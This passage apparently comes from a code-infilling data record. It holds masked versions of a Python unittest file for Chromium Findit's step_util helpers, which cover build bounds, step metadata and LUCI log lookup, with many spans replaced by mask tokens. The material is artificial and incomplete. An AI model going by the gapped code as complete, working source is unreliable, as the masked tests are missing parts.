step_util.LegacyGetIsolateTargetName('m',\n 'b', 200, 'viz_browser_tests (with patch) on Android'))\n <mask token>\n\n @parameterized.expand([({'isolate_target_name': 'isolate_target'},\n 'isolate_target'), (None, None), ({'a': 'b'}, None)])\n @mock.patch.object(step_util, 'GetStepMetadata')\n def testGetIsolateTargetName(self, step_metadata,\n expected_isolate_target, mocked_get_stepmeta):\n mocked_get_stepmeta.return_value = step_metadata\n self.assertEqual(expected_isolate_target, step_util.\n GetIsolateTargetName(123, 'full step name'))\n\n @mock.patch.object(step_util, 'GetStepMetadata')\n def testGetIsolateTargetPartialMatch(self, mock_get_step_metadata):\n step_util.GetIsolateTargetName(123, 'full step name')\n self.assertIn(False, mock_get_step_metadata.call_args[0])\n step_util.GetIsolateTargetName(123, 'full step name', True)\n self.assertIn(True, mock_get_step_metadata.call_args[0])\n\n @parameterized.expand([(wf_testcase.SAMPLE_STEP_METADATA, 'platform'),\n (None, None)])\n @mock.patch.object(step_util, 'GetStepMetadata')\n def testGetOS(self, mock_fn_return, expected_platform, mock_fn):\n mock_fn.return_value = mock_fn_return\n self.assertEqual(expected_platform, step_util.GetOS(123,\n 'builder_name', 'step_name'))\n <mask token>\n\n @mock.patch.object(step_util, 'GetStepMetadata', return_value=\n wf_testcase.SAMPLE_STEP_METADATA)\n def testGetOSCached(self, mock_fn):\n self.assertEqual('platform', step_util.GetOS(123, 'builder_name',\n 'step_name'))\n self.assertEqual(1, mock_fn.call_count)\n self.assertEqual('platform', step_util.GetOS(123, 'builder_name',\n 'step_name'))\n self.assertEqual(1, mock_fn.call_count)\n\n def testGetStepStartAndEndTime(self):\n build_id = '8945610992972640896'\n start_time = datetime.datetime(2019, 3, 6)\n end_time = datetime.datetime(2019, 3, 6, 0, 0, 10)\n step = Step()\n step.name = 's'\n step.start_time.FromDatetime(start_time)\n step.end_time.FromDatetime(end_time)\n build = Build()\n build.id = int(build_id)\n build.steps.extend([step])\n self.assertEqual((start_time, end_time), step_util.\n GetStepStartAndEndTime(build, 's'))\n self.assertEqual((None, None), step_util.GetStepStartAndEndTime(\n build, 's2'))\n",
"step-2": "<mask token>\n\n\nclass StepUtilTest(wf_testcase.WaterfallTestCase):\n\n def testGetLowerBoundBuildNumber(self):\n self.assertEqual(5, step_util._GetLowerBoundBuildNumber(5, 100))\n self.assertEqual(50, step_util._GetLowerBoundBuildNumber(None, 100,\n 200))\n self.assertEqual(100, step_util._GetLowerBoundBuildNumber(None, 600,\n 500))\n\n def testGetBoundingIsolatedTargets(self):\n lower_bound_commit_position = 1000\n upper_bound_commit_position = 1010\n requested_commit_position = 1005\n build_id = 10000\n target_name = 'browser_tests'\n master_name = 'm'\n builder_name = 'b'\n luci_name = 'chromium'\n bucket_name = 'ci'\n gitiles_host = 'chromium.googlesource.com'\n gitiles_project = 'chromium/src'\n gitiles_ref = 'refs/heads/master'\n gerrit_patch = ''\n lower_bound_revision = 'r1000'\n upper_bound_revision = 'r1010'\n lower_bound_target = IsolatedTarget.Create(build_id - 1, luci_name,\n bucket_name, master_name, builder_name, gitiles_host,\n gitiles_project, gitiles_ref, gerrit_patch, target_name,\n 'hash_1', lower_bound_commit_position, lower_bound_revision)\n lower_bound_target.put()\n upper_bound_target = IsolatedTarget.Create(build_id, luci_name,\n bucket_name, master_name, builder_name, gitiles_host,\n gitiles_project, gitiles_ref, gerrit_patch, target_name,\n 'hash_2', upper_bound_commit_position, upper_bound_revision)\n upper_bound_target.put()\n self.assertEqual((lower_bound_target, upper_bound_target),\n step_util.GetBoundingIsolatedTargets(master_name, builder_name,\n target_name, requested_commit_position))\n <mask token>\n\n @mock.patch.object(build_util, 'GetBuildInfo')\n def testGetValidBuildSearchAscendingOutOfRange(self, mocked_get_build_info\n ):\n master_name = 'm'\n builder_name = 'b'\n step_name = 's'\n invalid_build_100 = BuildInfo(master_name, builder_name, 100)\n invalid_build_101 = BuildInfo(master_name, builder_name, 101)\n valid_build_102 = BuildInfo(master_name, builder_name, 102)\n valid_build_102.commit_position = 1020\n mocked_get_build_info.side_effect = [invalid_build_100,\n invalid_build_101, valid_build_102]\n self.assertIsNone(step_util.GetValidBuild(master_name, builder_name,\n 100, step_name, True, 1))\n\n @mock.patch.object(build_util, 'GetBuildInfo')\n def testGetValidBuildSearchDescending(self, mocked_get_build_info):\n master_name = 'm'\n builder_name = 'b'\n step_name = 's'\n invalid_build_100 = BuildInfo(master_name, builder_name, 100)\n invalid_build_99 = BuildInfo(master_name, builder_name, 99)\n valid_build_98 = BuildInfo(master_name, builder_name, 98)\n valid_build_98.commit_position = 980\n mocked_get_build_info.side_effect = [invalid_build_100,\n invalid_build_99, valid_build_98]\n self.assertEqual(valid_build_98, step_util.GetValidBuild(\n master_name, builder_name, 100, step_name, True, 2))\n\n @mock.patch.object(swarming, 'CanFindSwarmingTaskFromBuildForAStep',\n return_value=True)\n @mock.patch.object(build_util, 'GetBuildInfo', _MockedGetBuildInfo)\n def testGetValidBoundingBuildsForStepExactMatch(self, *_):\n lower_bound, upper_bound = step_util.GetValidBoundingBuildsForStep('m',\n 'b', 's', 0, 100, 30)\n self.assertEqual(1, lower_bound.build_number)\n self.assertEqual(2, upper_bound.build_number)\n\n @mock.patch.object(swarming, 'CanFindSwarmingTaskFromBuildForAStep',\n return_value=True)\n @mock.patch.object(build_util, 'GetBuildInfo', _MockedGetBuildInfo)\n def testGetValidBoundingBuildsForStepCommitBeforeEarliestBuild(self, *_):\n lower_bound_build_number = 3\n lower_bound, upper_bound = 
step_util.GetValidBoundingBuildsForStep('m',\n 'b', 's', lower_bound_build_number, 100, 10)\n self.assertIsNone(lower_bound)\n self.assertEqual(lower_bound_build_number, upper_bound.build_number)\n <mask token>\n <mask token>\n\n @mock.patch.object(swarming, 'CanFindSwarmingTaskFromBuildForAStep',\n return_value=False)\n @mock.patch.object(build_util, 'GetBuildInfo', _MockedGetBuildInfo)\n def testGetValidBoundingBuildsForStepCommitAfterLatestBuildInvalid(self, *_\n ):\n upper_bound_build_number = 5\n lower_bound, upper_bound = step_util.GetValidBoundingBuildsForStep('m',\n 'b', 's', None, upper_bound_build_number, 10000)\n self.assertIsNone(lower_bound)\n self.assertIsNone(upper_bound)\n\n @mock.patch.object(swarming, 'CanFindSwarmingTaskFromBuildForAStep',\n return_value=True)\n @mock.patch.object(build_util, 'GetBuildInfo', _MockedGetBuildInfo)\n def testGetValidBoundingBuildsForStepCommitRightAtUpperBound(self, *_):\n upper_bound_build_number = 4\n lower_bound, upper_bound = step_util.GetValidBoundingBuildsForStep('m',\n 'b', 's', None, upper_bound_build_number, 50)\n self.assertEqual(50, lower_bound.commit_position)\n self.assertEqual(50, upper_bound.commit_position)\n <mask token>\n\n def testIsStepSupportedByFinditObjectNone(self):\n self.assertFalse(step_util.IsStepSupportedByFindit(None, 'step', 'm'))\n <mask token>\n\n def testIsStepSupportedByFinditOtherIsolatedScriptTest(self):\n self.assertFalse(step_util.IsStepSupportedByFindit(\n WebkitLayoutTestResults(None), 'telemetry_perf_tests', 'm'))\n\n @mock.patch.object(waterfall_config, 'StepIsSupportedForMaster',\n return_value=True)\n def testIsStepSupportedByFinditWebkitLayoutTests(self, _):\n self.assertTrue(step_util.IsStepSupportedByFindit(\n WebkitLayoutTestResults(None), 'webkit_layout_tests', 'm'))\n <mask token>\n\n @parameterized.expand([({'step_log_return': wf_testcase.\n SAMPLE_STEP_METADATA, 'expected_step_metadata': wf_testcase.\n SAMPLE_STEP_METADATA},), ({'step_log_return': wf_testcase.\n SAMPLE_STEP_METADATA, 'expected_step_metadata': wf_testcase.\n SAMPLE_STEP_METADATA},), ({'step_log_return': None,\n 'expected_step_metadata': None},), ({'step_log_return': None,\n 'expected_step_metadata': None},)])\n @mock.patch.object(step_util, 'GetStepLogForLuciBuild')\n def testGetStepMetadata(self, cases, mock_step_log):\n mock_step_log.return_value = cases['step_log_return']\n step_metadata = step_util.GetStepMetadata(123, 'step')\n self.assertEqual(cases['expected_step_metadata'], step_metadata)\n\n @mock.patch.object(step_util, 'GetStepLogForLuciBuild')\n def testGetStepMetadataPartialMatch(self, mock_step_log):\n step_util.GetStepMetadata(123, 'step', True)\n self.assertIn(True, mock_step_log.call_args[0])\n step_util.GetStepMetadata(123, 'step', False)\n self.assertIn(False, mock_step_log.call_args[0])\n <mask token>\n\n @mock.patch.object(build_util, 'DownloadBuildData', return_value=\n MockWaterfallBuild())\n @mock.patch.object(logdog_util, 'GetStepLogLegacy', return_value=':')\n def testMalformattedNinjaInfo(self, *_):\n step_metadata = step_util.GetWaterfallBuildStepLog('m', 'b', 123,\n 's', None, 'json.output[ninja_info]')\n self.assertIsNone(step_metadata)\n\n @mock.patch.object(build_util, 'DownloadBuildData', return_value=\n MockWaterfallBuild())\n @mock.patch.object(logdog_util, '_GetAnnotationsProtoForPath',\n return_value=None)\n def testLegacyGetStepMetadataStepNone(self, *_):\n step_metadata = step_util.GetWaterfallBuildStepLog('m', 'b', 123,\n 's', None, 'step_metadata')\n 
self.assertIsNone(step_metadata)\n <mask token>\n\n @mock.patch.object(step_util, 'GetStepLogForLuciBuild', return_value=\n wf_testcase.SAMPLE_STEP_METADATA)\n @mock.patch.object(build_util, 'DownloadBuildData')\n def testLegacyGetStepMetadataFromLUCIBuild(self, mock_build, _):\n build = WfBuild.Create('m', 'b', 123)\n build.build_id = '8948240770002521488'\n build.put()\n mock_build.return_value = build\n step_metadata = step_util.GetWaterfallBuildStepLog('m', 'b', 123,\n 's', None, 'step_metadata')\n self.assertEqual(step_metadata, wf_testcase.SAMPLE_STEP_METADATA)\n\n @mock.patch.object(build_util, 'DownloadBuildData', return_value=\n MockWaterfallBuild())\n @mock.patch.object(logdog_util, '_GetAnnotationsProtoForPath',\n return_value='step')\n @mock.patch.object(logdog_util, '_GetStreamForStep', return_value='stream')\n @mock.patch.object(logdog_util, 'GetStepLogLegacy', return_value=\n 'log1/nlog2')\n def testGetStepLogStdio(self, *_):\n self.assertEqual('log1/nlog2', step_util.GetWaterfallBuildStepLog(\n 'm', 'b', 123, 's', None))\n\n @mock.patch.object(build_util, 'DownloadBuildData', return_value=\n MockWaterfallBuild())\n @mock.patch.object(logdog_util, 'GetStepLogLegacy', return_value='log')\n @mock.patch.object(logging, 'error')\n def testGetStepLogNotJosonLoadable(self, mocked_log, *_):\n self.assertIsNone(step_util.GetWaterfallBuildStepLog('m', 'b', 123,\n 's', None, 'step_metadata'))\n mocked_log.assert_called_with(\n 'Failed to json load data for step_metadata. Data is: log.')\n <mask token>\n\n @mock.patch.object(step_util, '_GetStepLogViewUrl', return_value=None)\n @mock.patch.object(logdog_util, 'GetLogFromViewUrl')\n @mock.patch.object(buildbucket_client, 'GetV2Build')\n def testGetStepLogForLuciBuildNoViewUrl(self, mock_get_build,\n mock_get_log, _):\n build_id = '8945610992972640896'\n mock_log = common_pb2.Log()\n mock_log.name = 'step_metadata'\n mock_log.view_url = 'view_url'\n mock_step = Step()\n mock_step.name = 's'\n mock_step.logs.extend([mock_log])\n mock_build = Build()\n mock_build.id = int(build_id)\n mock_build.steps.extend([mock_step])\n mock_get_build.return_value = mock_build\n self.assertIsNone(step_util.GetStepLogForLuciBuild(build_id, 's',\n None, 'step_metadata'))\n self.assertFalse(mock_get_log.called)\n <mask token>\n\n @mock.patch.object(buildbucket_client, 'GetV2Build')\n @mock.patch.object(step_util, 'GetStepLogFromBuildObject')\n def testGetStepLogForLuciBuildPartialMatch(self, mock_log_from_build, _):\n step_util.GetStepLogForLuciBuild('87654321', 's', None)\n self.assertIn(False, mock_log_from_build.call_args[0])\n step_util.GetStepLogForLuciBuild('87654321', 's', None, True)\n self.assertIn(True, mock_log_from_build.call_args[0])\n\n @mock.patch.object(step_util, '_GetStepLogViewUrl', return_value=None)\n def testGetStepLogFromBuildObjectPartialMatch(self, mock_get_log_url):\n step_util.GetStepLogFromBuildObject(Build(), 'full_step_name',\n 'http_client')\n self.assertIn(False, mock_get_log_url.call_args[0])\n step_util.GetStepLogFromBuildObject(Build(), 'full_step_name',\n 'http_client', partial_match=True)\n self.assertIn(True, mock_get_log_url.call_args[0])\n\n def testGetStepLogViewUrlNoMatchingLog(self):\n build_id = 8945610992972640896\n mock_log = common_pb2.Log()\n mock_log.name = 'another_log'\n mock_log.view_url = 'view_url'\n mock_step1 = Step()\n mock_step1.name = 's1'\n mock_step1.logs.extend([mock_log])\n mock_step2 = Step()\n mock_step2.name = 's2'\n mock_step2.logs.extend([mock_log])\n mock_build = Build()\n mock_build.id = 
build_id\n mock_build.steps.extend([mock_step1, mock_step2])\n self.assertIsNone(step_util._GetStepLogViewUrl(mock_build, 's2', 'log')\n )\n\n @parameterized.expand([(True, 'step_name', 'view_url',\n 'view_url_partial_match'), (False, 'step_name', 'view_url', None)])\n def testGetStepLogViewUrlPartialMatching(self, partial_match,\n full_step_name, expected_url_in_build1, expected_url_in_build2):\n mock_step1 = Step()\n mock_step1.name = 'step_name'\n mock_log1 = common_pb2.Log()\n mock_log1.name = 'log'\n mock_log1.view_url = 'view_url'\n mock_step1.logs.extend([mock_log1])\n mock_step2 = Step()\n mock_step2.name = 'step_name_longer'\n mock_log2 = common_pb2.Log()\n mock_log2.name = 'log'\n mock_log2.view_url = 'view_url_partial_match'\n mock_step2.logs.extend([mock_log2])\n mock_build1 = Build()\n mock_build1.steps.extend([mock_step1, mock_step2])\n self.assertEqual(expected_url_in_build1, step_util.\n _GetStepLogViewUrl(mock_build1, full_step_name, 'log',\n partial_match=partial_match))\n mock_build2 = Build()\n mock_build2.steps.extend([mock_step2])\n self.assertEqual(expected_url_in_build2, step_util.\n _GetStepLogViewUrl(mock_build2, full_step_name, 'log',\n partial_match=partial_match))\n <mask token>\n <mask token>\n <mask token>\n\n @mock.patch.object(step_util, 'GetStepLogForLuciBuild')\n def testGetStepMetadataCached(self, mock_fn, *_):\n mock_fn.side_effect = [None, {'canonical_step_name': 'step_name'}]\n self.assertEqual(None, step_util.GetStepMetadata(123,\n 'step_name on a platform'))\n self.assertTrue(mock_fn.call_count == 1)\n self.assertEqual({'canonical_step_name': 'step_name'}, step_util.\n GetStepMetadata(123, 'step_name on a platform'))\n self.assertTrue(mock_fn.call_count == 2)\n self.assertEqual({'canonical_step_name': 'step_name'}, step_util.\n GetStepMetadata(123, 'step_name on a platform'))\n self.assertTrue(mock_fn.call_count == 2)\n <mask token>\n <mask token>\n\n @mock.patch.object(step_util, 'GetStepMetadata')\n def testGetCanonicalStepNamePartialMatch(self, mock_get_step_metadata):\n step_util.GetCanonicalStepName(123, 'full step name')\n self.assertIn(False, mock_get_step_metadata.call_args[0])\n step_util.GetCanonicalStepName(123, 'full step name', True)\n self.assertIn(True, mock_get_step_metadata.call_args[0])\n <mask token>\n\n @mock.patch.object(step_util, 'LegacyGetStepMetadata', return_value=None)\n def testLegacyGetIsolateTargetNameStepMetadataIsNone(self, _):\n self.assertEqual(None, step_util.LegacyGetIsolateTargetName('m',\n 'b', 200, 'viz_browser_tests (with patch) on Android'))\n <mask token>\n\n @parameterized.expand([({'isolate_target_name': 'isolate_target'},\n 'isolate_target'), (None, None), ({'a': 'b'}, None)])\n @mock.patch.object(step_util, 'GetStepMetadata')\n def testGetIsolateTargetName(self, step_metadata,\n expected_isolate_target, mocked_get_stepmeta):\n mocked_get_stepmeta.return_value = step_metadata\n self.assertEqual(expected_isolate_target, step_util.\n GetIsolateTargetName(123, 'full step name'))\n\n @mock.patch.object(step_util, 'GetStepMetadata')\n def testGetIsolateTargetPartialMatch(self, mock_get_step_metadata):\n step_util.GetIsolateTargetName(123, 'full step name')\n self.assertIn(False, mock_get_step_metadata.call_args[0])\n step_util.GetIsolateTargetName(123, 'full step name', True)\n self.assertIn(True, mock_get_step_metadata.call_args[0])\n\n @parameterized.expand([(wf_testcase.SAMPLE_STEP_METADATA, 'platform'),\n (None, None)])\n @mock.patch.object(step_util, 'GetStepMetadata')\n def testGetOS(self, 
mock_fn_return, expected_platform, mock_fn):\n mock_fn.return_value = mock_fn_return\n self.assertEqual(expected_platform, step_util.GetOS(123,\n 'builder_name', 'step_name'))\n <mask token>\n\n @mock.patch.object(step_util, 'GetStepMetadata', return_value=\n wf_testcase.SAMPLE_STEP_METADATA)\n def testGetOSCached(self, mock_fn):\n self.assertEqual('platform', step_util.GetOS(123, 'builder_name',\n 'step_name'))\n self.assertEqual(1, mock_fn.call_count)\n self.assertEqual('platform', step_util.GetOS(123, 'builder_name',\n 'step_name'))\n self.assertEqual(1, mock_fn.call_count)\n\n def testGetStepStartAndEndTime(self):\n build_id = '8945610992972640896'\n start_time = datetime.datetime(2019, 3, 6)\n end_time = datetime.datetime(2019, 3, 6, 0, 0, 10)\n step = Step()\n step.name = 's'\n step.start_time.FromDatetime(start_time)\n step.end_time.FromDatetime(end_time)\n build = Build()\n build.id = int(build_id)\n build.steps.extend([step])\n self.assertEqual((start_time, end_time), step_util.\n GetStepStartAndEndTime(build, 's'))\n self.assertEqual((None, None), step_util.GetStepStartAndEndTime(\n build, 's2'))\n",
"step-3": "<mask token>\n\n\nclass StepUtilTest(wf_testcase.WaterfallTestCase):\n\n def testGetLowerBoundBuildNumber(self):\n self.assertEqual(5, step_util._GetLowerBoundBuildNumber(5, 100))\n self.assertEqual(50, step_util._GetLowerBoundBuildNumber(None, 100,\n 200))\n self.assertEqual(100, step_util._GetLowerBoundBuildNumber(None, 600,\n 500))\n\n def testGetBoundingIsolatedTargets(self):\n lower_bound_commit_position = 1000\n upper_bound_commit_position = 1010\n requested_commit_position = 1005\n build_id = 10000\n target_name = 'browser_tests'\n master_name = 'm'\n builder_name = 'b'\n luci_name = 'chromium'\n bucket_name = 'ci'\n gitiles_host = 'chromium.googlesource.com'\n gitiles_project = 'chromium/src'\n gitiles_ref = 'refs/heads/master'\n gerrit_patch = ''\n lower_bound_revision = 'r1000'\n upper_bound_revision = 'r1010'\n lower_bound_target = IsolatedTarget.Create(build_id - 1, luci_name,\n bucket_name, master_name, builder_name, gitiles_host,\n gitiles_project, gitiles_ref, gerrit_patch, target_name,\n 'hash_1', lower_bound_commit_position, lower_bound_revision)\n lower_bound_target.put()\n upper_bound_target = IsolatedTarget.Create(build_id, luci_name,\n bucket_name, master_name, builder_name, gitiles_host,\n gitiles_project, gitiles_ref, gerrit_patch, target_name,\n 'hash_2', upper_bound_commit_position, upper_bound_revision)\n upper_bound_target.put()\n self.assertEqual((lower_bound_target, upper_bound_target),\n step_util.GetBoundingIsolatedTargets(master_name, builder_name,\n target_name, requested_commit_position))\n <mask token>\n\n @mock.patch.object(build_util, 'GetBuildInfo')\n def testGetValidBuildSearchAscendingOutOfRange(self, mocked_get_build_info\n ):\n master_name = 'm'\n builder_name = 'b'\n step_name = 's'\n invalid_build_100 = BuildInfo(master_name, builder_name, 100)\n invalid_build_101 = BuildInfo(master_name, builder_name, 101)\n valid_build_102 = BuildInfo(master_name, builder_name, 102)\n valid_build_102.commit_position = 1020\n mocked_get_build_info.side_effect = [invalid_build_100,\n invalid_build_101, valid_build_102]\n self.assertIsNone(step_util.GetValidBuild(master_name, builder_name,\n 100, step_name, True, 1))\n\n @mock.patch.object(build_util, 'GetBuildInfo')\n def testGetValidBuildSearchDescending(self, mocked_get_build_info):\n master_name = 'm'\n builder_name = 'b'\n step_name = 's'\n invalid_build_100 = BuildInfo(master_name, builder_name, 100)\n invalid_build_99 = BuildInfo(master_name, builder_name, 99)\n valid_build_98 = BuildInfo(master_name, builder_name, 98)\n valid_build_98.commit_position = 980\n mocked_get_build_info.side_effect = [invalid_build_100,\n invalid_build_99, valid_build_98]\n self.assertEqual(valid_build_98, step_util.GetValidBuild(\n master_name, builder_name, 100, step_name, True, 2))\n\n @mock.patch.object(swarming, 'CanFindSwarmingTaskFromBuildForAStep',\n return_value=True)\n @mock.patch.object(build_util, 'GetBuildInfo', _MockedGetBuildInfo)\n def testGetValidBoundingBuildsForStepExactMatch(self, *_):\n lower_bound, upper_bound = step_util.GetValidBoundingBuildsForStep('m',\n 'b', 's', 0, 100, 30)\n self.assertEqual(1, lower_bound.build_number)\n self.assertEqual(2, upper_bound.build_number)\n\n @mock.patch.object(swarming, 'CanFindSwarmingTaskFromBuildForAStep',\n return_value=True)\n @mock.patch.object(build_util, 'GetBuildInfo', _MockedGetBuildInfo)\n def testGetValidBoundingBuildsForStepCommitBeforeEarliestBuild(self, *_):\n lower_bound_build_number = 3\n lower_bound, upper_bound = 
step_util.GetValidBoundingBuildsForStep('m',\n 'b', 's', lower_bound_build_number, 100, 10)\n self.assertIsNone(lower_bound)\n self.assertEqual(lower_bound_build_number, upper_bound.build_number)\n <mask token>\n <mask token>\n\n @mock.patch.object(swarming, 'CanFindSwarmingTaskFromBuildForAStep',\n return_value=False)\n @mock.patch.object(build_util, 'GetBuildInfo', _MockedGetBuildInfo)\n def testGetValidBoundingBuildsForStepCommitAfterLatestBuildInvalid(self, *_\n ):\n upper_bound_build_number = 5\n lower_bound, upper_bound = step_util.GetValidBoundingBuildsForStep('m',\n 'b', 's', None, upper_bound_build_number, 10000)\n self.assertIsNone(lower_bound)\n self.assertIsNone(upper_bound)\n\n @mock.patch.object(swarming, 'CanFindSwarmingTaskFromBuildForAStep',\n return_value=True)\n @mock.patch.object(build_util, 'GetBuildInfo', _MockedGetBuildInfo)\n def testGetValidBoundingBuildsForStepCommitRightAtUpperBound(self, *_):\n upper_bound_build_number = 4\n lower_bound, upper_bound = step_util.GetValidBoundingBuildsForStep('m',\n 'b', 's', None, upper_bound_build_number, 50)\n self.assertEqual(50, lower_bound.commit_position)\n self.assertEqual(50, upper_bound.commit_position)\n\n @mock.patch.object(swarming, 'CanFindSwarmingTaskFromBuildForAStep',\n return_value=True)\n @mock.patch.object(build_util, 'GetBuildInfo', _MockedGetBuildInfo)\n def testGetValidBoundingBuildsForStepCommitRightAtLowerBound(self, *_):\n upper_bound_build_number = 4\n lower_bound_build_number = 1\n lower_bound, upper_bound = step_util.GetValidBoundingBuildsForStep('m',\n 'b', 's', lower_bound_build_number, upper_bound_build_number, 20)\n self.assertEqual(20, lower_bound.commit_position)\n self.assertEqual(20, upper_bound.commit_position)\n\n def testIsStepSupportedByFinditObjectNone(self):\n self.assertFalse(step_util.IsStepSupportedByFindit(None, 'step', 'm'))\n\n @mock.patch.object(waterfall_config, 'StepIsSupportedForMaster',\n return_value=False)\n def testStepNotSupportedByFindit(self, _):\n self.assertFalse(step_util.IsStepSupportedByFindit(\n WebkitLayoutTestResults(None), 'step', 'm'))\n\n def testIsStepSupportedByFinditOtherIsolatedScriptTest(self):\n self.assertFalse(step_util.IsStepSupportedByFindit(\n WebkitLayoutTestResults(None), 'telemetry_perf_tests', 'm'))\n\n @mock.patch.object(waterfall_config, 'StepIsSupportedForMaster',\n return_value=True)\n def testIsStepSupportedByFinditWebkitLayoutTests(self, _):\n self.assertTrue(step_util.IsStepSupportedByFindit(\n WebkitLayoutTestResults(None), 'webkit_layout_tests', 'm'))\n\n @mock.patch.object(waterfall_config, 'StepIsSupportedForMaster',\n return_value=True)\n def testIsStepSupportedByFinditGtests(self, _):\n self.assertTrue(step_util.IsStepSupportedByFindit(GtestTestResults(\n None), 'browser_tests', 'm'))\n\n @parameterized.expand([({'step_log_return': wf_testcase.\n SAMPLE_STEP_METADATA, 'expected_step_metadata': wf_testcase.\n SAMPLE_STEP_METADATA},), ({'step_log_return': wf_testcase.\n SAMPLE_STEP_METADATA, 'expected_step_metadata': wf_testcase.\n SAMPLE_STEP_METADATA},), ({'step_log_return': None,\n 'expected_step_metadata': None},), ({'step_log_return': None,\n 'expected_step_metadata': None},)])\n @mock.patch.object(step_util, 'GetStepLogForLuciBuild')\n def testGetStepMetadata(self, cases, mock_step_log):\n mock_step_log.return_value = cases['step_log_return']\n step_metadata = step_util.GetStepMetadata(123, 'step')\n self.assertEqual(cases['expected_step_metadata'], step_metadata)\n\n @mock.patch.object(step_util, 'GetStepLogForLuciBuild')\n def 
testGetStepMetadataPartialMatch(self, mock_step_log):\n step_util.GetStepMetadata(123, 'step', True)\n self.assertIn(True, mock_step_log.call_args[0])\n step_util.GetStepMetadata(123, 'step', False)\n self.assertIn(False, mock_step_log.call_args[0])\n\n @mock.patch.object(logdog_util, '_GetAnnotationsProtoForPath',\n return_value='step')\n @mock.patch.object(logdog_util, '_GetStreamForStep', return_value=\n 'log_stream')\n @mock.patch.object(logdog_util, 'GetStepLogLegacy', return_value=json.\n dumps(wf_testcase.SAMPLE_STEP_METADATA))\n @mock.patch.object(build_util, 'DownloadBuildData', return_value=\n MockWaterfallBuild())\n def testLegacyGetStepMetadata(self, *_):\n step_metadata = step_util.GetWaterfallBuildStepLog('m', 'b', 123,\n 's', None, 'step_metadata')\n self.assertEqual(step_metadata, wf_testcase.SAMPLE_STEP_METADATA)\n\n @mock.patch.object(build_util, 'DownloadBuildData', return_value=\n MockWaterfallBuild())\n @mock.patch.object(logdog_util, 'GetStepLogLegacy', return_value=':')\n def testMalformattedNinjaInfo(self, *_):\n step_metadata = step_util.GetWaterfallBuildStepLog('m', 'b', 123,\n 's', None, 'json.output[ninja_info]')\n self.assertIsNone(step_metadata)\n\n @mock.patch.object(build_util, 'DownloadBuildData', return_value=\n MockWaterfallBuild())\n @mock.patch.object(logdog_util, '_GetAnnotationsProtoForPath',\n return_value=None)\n def testLegacyGetStepMetadataStepNone(self, *_):\n step_metadata = step_util.GetWaterfallBuildStepLog('m', 'b', 123,\n 's', None, 'step_metadata')\n self.assertIsNone(step_metadata)\n\n @mock.patch.object(build_util, 'DownloadBuildData', return_value=\n MockWaterfallBuild())\n @mock.patch.object(logdog_util, '_GetAnnotationsProtoForPath',\n return_value='step')\n @mock.patch.object(logdog_util, '_GetStreamForStep', return_value=None)\n def testLegacyGetStepMetadataStreamNone(self, *_):\n step_metadata = step_util.GetWaterfallBuildStepLog('m', 'b', 123,\n 's', None, 'step_metadata')\n self.assertIsNone(step_metadata)\n\n @mock.patch.object(step_util, 'GetStepLogForLuciBuild', return_value=\n wf_testcase.SAMPLE_STEP_METADATA)\n @mock.patch.object(build_util, 'DownloadBuildData')\n def testLegacyGetStepMetadataFromLUCIBuild(self, mock_build, _):\n build = WfBuild.Create('m', 'b', 123)\n build.build_id = '8948240770002521488'\n build.put()\n mock_build.return_value = build\n step_metadata = step_util.GetWaterfallBuildStepLog('m', 'b', 123,\n 's', None, 'step_metadata')\n self.assertEqual(step_metadata, wf_testcase.SAMPLE_STEP_METADATA)\n\n @mock.patch.object(build_util, 'DownloadBuildData', return_value=\n MockWaterfallBuild())\n @mock.patch.object(logdog_util, '_GetAnnotationsProtoForPath',\n return_value='step')\n @mock.patch.object(logdog_util, '_GetStreamForStep', return_value='stream')\n @mock.patch.object(logdog_util, 'GetStepLogLegacy', return_value=\n 'log1/nlog2')\n def testGetStepLogStdio(self, *_):\n self.assertEqual('log1/nlog2', step_util.GetWaterfallBuildStepLog(\n 'm', 'b', 123, 's', None))\n\n @mock.patch.object(build_util, 'DownloadBuildData', return_value=\n MockWaterfallBuild())\n @mock.patch.object(logdog_util, 'GetStepLogLegacy', return_value='log')\n @mock.patch.object(logging, 'error')\n def testGetStepLogNotJosonLoadable(self, mocked_log, *_):\n self.assertIsNone(step_util.GetWaterfallBuildStepLog('m', 'b', 123,\n 's', None, 'step_metadata'))\n mocked_log.assert_called_with(\n 'Failed to json load data for step_metadata. 
Data is: log.')\n\n @mock.patch.object(buildbucket_client, 'GetV2Build', return_value=None)\n def testGetStepLogForLuciBuildError(self, _):\n self.assertIsNone(step_util.GetStepLogForLuciBuild('87654321', 's',\n None))\n\n @mock.patch.object(step_util, '_GetStepLogViewUrl', return_value=None)\n @mock.patch.object(logdog_util, 'GetLogFromViewUrl')\n @mock.patch.object(buildbucket_client, 'GetV2Build')\n def testGetStepLogForLuciBuildNoViewUrl(self, mock_get_build,\n mock_get_log, _):\n build_id = '8945610992972640896'\n mock_log = common_pb2.Log()\n mock_log.name = 'step_metadata'\n mock_log.view_url = 'view_url'\n mock_step = Step()\n mock_step.name = 's'\n mock_step.logs.extend([mock_log])\n mock_build = Build()\n mock_build.id = int(build_id)\n mock_build.steps.extend([mock_step])\n mock_get_build.return_value = mock_build\n self.assertIsNone(step_util.GetStepLogForLuciBuild(build_id, 's',\n None, 'step_metadata'))\n self.assertFalse(mock_get_log.called)\n <mask token>\n\n @mock.patch.object(buildbucket_client, 'GetV2Build')\n @mock.patch.object(step_util, 'GetStepLogFromBuildObject')\n def testGetStepLogForLuciBuildPartialMatch(self, mock_log_from_build, _):\n step_util.GetStepLogForLuciBuild('87654321', 's', None)\n self.assertIn(False, mock_log_from_build.call_args[0])\n step_util.GetStepLogForLuciBuild('87654321', 's', None, True)\n self.assertIn(True, mock_log_from_build.call_args[0])\n\n @mock.patch.object(step_util, '_GetStepLogViewUrl', return_value=None)\n def testGetStepLogFromBuildObjectPartialMatch(self, mock_get_log_url):\n step_util.GetStepLogFromBuildObject(Build(), 'full_step_name',\n 'http_client')\n self.assertIn(False, mock_get_log_url.call_args[0])\n step_util.GetStepLogFromBuildObject(Build(), 'full_step_name',\n 'http_client', partial_match=True)\n self.assertIn(True, mock_get_log_url.call_args[0])\n\n def testGetStepLogViewUrlNoMatchingLog(self):\n build_id = 8945610992972640896\n mock_log = common_pb2.Log()\n mock_log.name = 'another_log'\n mock_log.view_url = 'view_url'\n mock_step1 = Step()\n mock_step1.name = 's1'\n mock_step1.logs.extend([mock_log])\n mock_step2 = Step()\n mock_step2.name = 's2'\n mock_step2.logs.extend([mock_log])\n mock_build = Build()\n mock_build.id = build_id\n mock_build.steps.extend([mock_step1, mock_step2])\n self.assertIsNone(step_util._GetStepLogViewUrl(mock_build, 's2', 'log')\n )\n\n @parameterized.expand([(True, 'step_name', 